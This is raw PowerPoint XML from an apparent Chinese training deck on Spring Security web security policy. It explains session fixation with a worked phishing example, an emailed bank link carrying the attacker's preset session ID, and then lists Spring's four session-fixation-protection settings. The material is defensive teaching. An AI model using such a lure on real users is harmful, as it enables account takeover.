                <a:sym typeface="+mn-lt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xmlns="" id="{B56AA7D8-76EF-4DB2-9171-0DCF3C3F9940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7478783" y="2551978"/>
              <a:ext cx="4934024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会话固定攻击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(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Session Fixation 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</a:rPr>
                <a:t>Attack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)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是一种诱骗受害者使用攻击者指定的会话标识（</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>SessionID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）的攻击手段。这是攻击者获取合法会话标识的最简单的方法。（让合法用户使用黑客预先设置的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>sessionID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进行登录，从而是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Web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不再进行生成新的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>sessionID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，从而导致黑客设置的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>sessionId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变成了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合法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标识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。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）</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN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AC7928B7-4C8F-4F94-9AE1-D1C443BA3495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5152571" y="1223248"/>
            <a:ext cx="6900562" cy="2723823"/>
            <a:chOff x="7478782" y="1890258"/>
            <a:chExt cx="4985657" cy="2723823"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Text Box 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9B03D3CB-3C4A-4546-AC9A-A77ED65D0C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54984" y="1890258"/>
              <a:ext cx="4540536" cy="568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45720" tIns="22860" rIns="45720" bIns="22860">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>相关示例</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt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xmlns="" id="{B56AA7D8-76EF-4DB2-9171-0DCF3C3F9940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7478782" y="2551978"/>
              <a:ext cx="4985657" cy="20621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比如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</a:rPr>
                <a:t>Tom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先打开一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个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银行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网站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http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</a:rPr>
                <a:t>://hundbank.com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，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然后服务器会回复他一个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session id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。比如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SID=mjg4qid0wioq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。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Tom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把这个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id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记下了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</a:rPr>
                <a:t>;Tom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给</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Jone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发送了一封邮件，假装是宣传某银行的新服务业务，提供了服务率先体检的链接：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
                <a:t> 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http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</a:rPr>
                <a:t>://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 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</a:rPr>
                <a:t>hundbank.com/?SID=mjg4qid0wioq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。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</a:rPr>
                <a:t>SID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就是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</a:rPr>
                <a:t>Tom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自己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的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session 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</a:rPr>
                <a:t>id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。</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Jone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好奇点击了链接，像往常一样输入了自己的账号和密码登录了银行的网站。因为服务器的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</a:rPr>
                <a:t>session id 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没有改变，现在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</a:rPr>
                <a:t>Tom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点击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http:// hundbank.com/?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</a:rPr>
                <a:t>SID=mjg4qid0wioq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后，就拥有了</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Jone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的身份进行非法操作了。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs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4941771"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="100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53143" y="551543"/>
            <a:ext cx="4238172" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4238172" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373258" y="1124504"/>
              <a:ext cx="3149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Web</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean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安全策略</a:t>
              </a:r>
              <a:endPara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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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2</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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AC7928B7-4C8F-4F94-9AE1-D1C443BA3495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1023257" y="1183267"/>
            <a:ext cx="11023600" cy="4726555"/>
            <a:chOff x="7478783" y="1890258"/>
            <a:chExt cx="4616735" cy="4208426"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Text Box 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9B03D3CB-3C4A-4546-AC9A-A77ED65D0C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54983" y="1890258"/>
              <a:ext cx="4540535" cy="5060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45720" tIns="22860" rIns="45720" bIns="22860">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Spring Security </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>防范 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Session Fixation </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Attack</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt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xmlns="" id="{B56AA7D8-76EF-4DB2-9171-0DCF3C3F9940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7478783" y="2371770"/>
              <a:ext cx="4324636" cy="37269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cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>会话</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>固定攻击是一种潜在的风险，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</a:rPr>
                <a:t>它</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>可以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</a:rPr>
                <a:t>使</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>恶意攻击者通过访问站点来创建会话，然后说服另一个用户使用相同的会话登录</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>例如，通过将包含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</a:rPr>
                <a:t>会话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</a:rPr>
                <a:t>ID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</a:rPr>
                <a:t>的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>链接作为参数发送给它们</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>。</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Spring</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>安全性通过创建一个新会话或在用户登录时更改会话</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>ID</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>来自动保护它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</a:rPr>
                <a:t>。你可以通过在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</a:rPr>
                <a:t>&lt;session-management&gt;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</a:rPr>
                <a:t>指定 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</a:rPr>
                <a:t>session-fixation-protection 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</a:rPr>
                <a:t>属性来配置相关保护，共有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</a:rPr>
                <a:t>4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</a:rPr>
                <a:t>种选项：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>1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</a:rPr>
                <a:t>、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</a:rPr>
                <a:t>none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</a:rPr>
                <a:t>：不开启保护，原有会话保留。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2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</a:rPr>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>newSession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</a:rPr>
                <a:t>：创建一个全新的会话，不拷贝原有会话中的数据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</a:rPr>
                <a:t>(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</a:rPr>
                <a:t>注：但是与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</a:rPr>
                <a:t>Spring Security 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</a:rPr>
                <a:t>相关的属性将被拷贝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</a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>3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</a:rPr>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>migrateSession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</a:rPr>
                <a:t>：创建一个新会话并拷贝原有会话中的所有属性。在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</a:rPr>
                <a:t>Servlet3.0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</a:rPr>
                <a:t>中这是默认行为。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>4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</a:rPr>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>changeSessionId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</a:rPr>
                <a:t>：不创建新的会话，而是采用 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</a:rPr>
                <a:t>Servlet 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</a:rPr>
                <a:t>容器提供的会话固定攻击保护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</a:rPr>
                <a:t>(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</a:rPr>
                <a:t>即：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>HttpServletRequest#changeSessionId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</a:rPr>
                <a:t>())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</a:rPr>
                <a:t>。这个选项仅在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</a:rPr>
                <a:t>Servlet3.1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</a:rPr>
                <a:t>规范中有效。老版本的容器将导致异常。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Spring Security 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</a:rPr>
                <a:t>配置示例：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p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zh-CN" altLang="en-US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0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="6D180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&lt;session-management&gt;</a:t>
            </a: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715" y="4065000"/>
            <a:ext cx="6095238" cy="1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87666"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="100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椭圆 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2931886" y="2786743"/>
            <a:ext cx="1567543" cy="1567543"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="56F2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902857" y="3207657"/>
            <a:ext cx="15530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目录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6186268" y="531222"/>
            <a:ext cx="740228" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="740228" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="椭圆 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="55000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="215900">
                <a:srgbClr val="7A9A92">
                  <a:alpha val="5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6444343" y="1132114"/>
              <a:ext cx="4354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>
                  <a:solidFill>
                    <a:srgbClr val="7A9A92"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="7A9A9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A70EBAA6-8F3E-4375-A644-70DC01DDDEC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6186268" y="1740746"/>
            <a:ext cx="740228" cy="740228"/>
            <a:chOff x="7888513" y="2225524"/>
            <a:chExt cx="740228" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="椭圆 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7888513" y="2225524"/>
              <a:ext cx="740228" cy="740228"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="55000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="215900">
                <a:srgbClr val="7A9A92">
                  <a:alpha val="5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8062686" y="2329542"/>
              <a:ext cx="4354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7A9A92"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A9A9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D70A3B20-8415-4FB3-8E93-7BDAC6CC09B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6186268" y="2950270"/>
            <a:ext cx="740228" cy="740228"/>
            <a:chOff x="6328229" y="3435048"/>
            <a:chExt cx="740228" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="椭圆 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6328229" y="3435048"/>
              <a:ext cx="740228" cy="740228"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="55000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="215900">
                <a:srgbClr val="7A9A92">
                  <a:alpha val="5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6495143" y="3563257"/>
              <a:ext cx="4354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7A9A92"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>3</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A9A9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xmlns="" id="{F913CE53-F12C-466B-B3B3-3553A179A385}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6186268" y="4145279"/>
            <a:ext cx="740228" cy="740228"/>
            <a:chOff x="7786913" y="4644571"/>
            <a:chExt cx="740228" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="椭圆 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7786913" y="4644571"/>
              <a:ext cx="740228" cy="740228"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="55000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="215900">
                <a:srgbClr val="7A9A92">
                  <a:alpha val="5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7932058" y="4753428"/>
              <a:ext cx="4354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>
                  <a:solidFill>
                    <a:srgbClr val="7A9A92"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="7A9A92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60EEB003-5397-4FE0-A4FC-678A907F81A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7072024" y="633902"/>
            <a:ext cx="432169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Spring Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0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权限管理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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717C24B4-615A-415F-8506-E1EC8C10CE83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6795869" y="1745715"/>
            <a:ext cx="3156028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Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0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安全策略</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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66B3810C-8E42-4CEC-8D85-1F5FF9323A0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6360441" y="3044370"/>
            <a:ext cx="4844205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Remember Me</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0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特性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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66B3810C-8E42-4CEC-8D85-1F5FF9323A0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5951780" y="5352735"/>
            <a:ext cx="4844205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Ajax </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0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登录认证</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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F913CE53-F12C-466B-B3B3-3553A179A385}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6195880" y="5274156"/>
            <a:ext cx="740228" cy="740228"/>
            <a:chOff x="7786913" y="4644571"/>
            <a:chExt cx="740228" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="椭圆 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7786913" y="4644571"/>
